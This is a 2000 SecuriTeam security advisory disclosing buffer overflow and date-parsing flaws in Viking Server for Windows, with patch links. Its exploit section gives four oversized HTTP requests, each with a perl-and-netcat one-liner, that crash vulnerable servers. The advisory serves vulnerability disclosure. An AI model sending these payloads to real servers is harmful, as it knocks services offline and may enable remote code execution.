Security Advisory: [NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing)

[EN] securityvulns.ru
no-pyccku

Related information
Переполнение буфера в Viking Server

From: Aviram Jenik <aviram_(at)_BEYONDSECURITY.COM>
Date: 29.08.2000
Subject: [NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing)

The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com

Viking security vulnerabilities enable remote code execution (long
URL,
date parsing)
----------------------------------------------------------------------------
----

SUMMARY

<http://www.robtex.com/viking/> Viking Server is a multi-protocol
Internet server/proxy for Windows 95/NT that supports a wide range of
protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,
ICP, etc. Unfortunately it does not perform proper buffer bounds checking,
enabling attackers to launch a buffer overflow attack and possibly execute
arbitrary code. Also, an incorrect parsing of non-date data causes an
exception, enabling remote attackers to cause a Denial of Service attack
against the product.

DETAILS

Vulnerable systems:
Viking 1.06 build 355 and prior

Immune systems:
Viking 1.06 build 370 and above

Exploit:
Any of the following HTTP commands will crash the server:

(1)
GET [x11765] HTTP/1.1<enter><enter>

(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

(2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>

(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)

(3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>

(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc
127.1 80)

(4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>

(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)

Patch:
Robotex has responded immediately and released a patch that deals with
these issues.
You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip

====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
====================

--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com